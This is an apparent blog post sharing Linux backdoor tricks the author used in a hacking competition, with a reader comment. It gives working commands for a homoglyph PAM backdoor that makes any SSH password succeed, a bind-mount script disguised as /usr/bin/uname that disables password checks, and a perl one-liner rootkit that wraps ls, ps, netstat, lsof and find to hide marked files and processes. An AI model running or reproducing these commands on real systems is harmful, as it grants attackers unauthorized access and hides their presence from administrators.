Linux Backdoors and other evil

My experience at a certain competition (evading the search engines here) has prompted two individuals in separate contexts to ask me about some of the evil tricks I discovered and played on the competitors.

I’ve been using some form of *NIX since 1996, when it was introduced to me in High School. Since then I’ve kept up my CLI Foo with *NIX, *BSD, and OSX. In other words, I’m pretty comfortable and fluent in this space. I won’t get into the “back in my day” stuff, but lets just say we used to compile our own kernels and having GCC installed was a requirement if you wanted to get anything done.

Anyway, my friends and teammates knew I had some knowledge and asked me to lead the Linux front. Thus began my two week long obsession with how to really f* up Linux in the shortest amount of time possible. It turns out there is even a competition for this stuff, with the gist being” “given only 15 minutes of access, do your worst.”

From this Hacking Contest, I’ll summarize and share a couple of techniques here with links to the original blog posts. I’m not into waxing poetic, and I won’t blame you if you completely glossed over the above paragraphs, I would. Lets get to code, shall we?

Probably my favorite is the “always return true” on SSH authentication. I found this trick on Jakob Lell’s blog, “Invisible configuration file backdooring with Unicode Homoglyphs“. Yes, homoglyphs have been around for a while. What we’re doing here is creating a pam_deոy.so with pam_permit.so, and changing /etc/pam.d/common-auth to reflect our new homoglyph “n” character. The result is that regardless of what password you type in, you always get in! Of course, you could also just copy pam_permit.so over top of pam_deny.so depending how badly you’d need/want to keep the original (how destructive can/want to be?).

cp /lib/*/security/pam_permit.so /lib/security/pam_de$'\u578'y.so
perl -i -pe's/deny/de\x{578}y/' /etc/pam.d/common-auth

Here’s another way to achieve the same thing from Hacking Contest Binary Planting

#!/bin/sh
mount --bind /lib/*/*/pam_permit.so /lib/*/*/pam_unix.so 2>/dev/null
/bin/uname $*

Where we use the “mount” command to stomp on all the pam password checks with pam_permit.so. Creating this small script as /usr/bin/uname ensures it’s run as the first ‘uname’, which is often run on *nix systems at reboot or console login.

Using more homoglyphs, we can plant a simple rootkit.

which ls netstat ps lsof find|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|177\"";chmod 493,$o'

What are we doing here? We’re replacing ls, netstat, ps, lsof, and find with shell scripts of same names and replacing the originals with  “n” and “s” looking homoglyphs. These shell scripts remove any line with “177” in the output. To use this, name your files and process with those magic characters.

The next step for me is to harvest the best backdoors and drop them into an Empire Trollsploit package. A problem I ran into at the competition is that some of these are not idempotent, meaning, if you run more than once on the same system, things get weird and/or broken. So that necessarily has to be a check.

If you’re interested in this stuff, I encourage you to take a look at the following blog posts where I found the above tricks and a whole lot more:

Linux Rootkits

Hacking Contest Notes

Hacking Contest Rootkit

g0t r00t pwning a machine

Hacking Contest SSH Server Wrapper

 

 

 

 

 

 

 

2 thoughts on “Linux Backdoors and other evil

  1. snake plissken

    Still fresh and green tho gaining knowledge.. Great article and stuff, tho am wondering since android is build around linux.. Would android platform be exposed to the same threat vector?

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s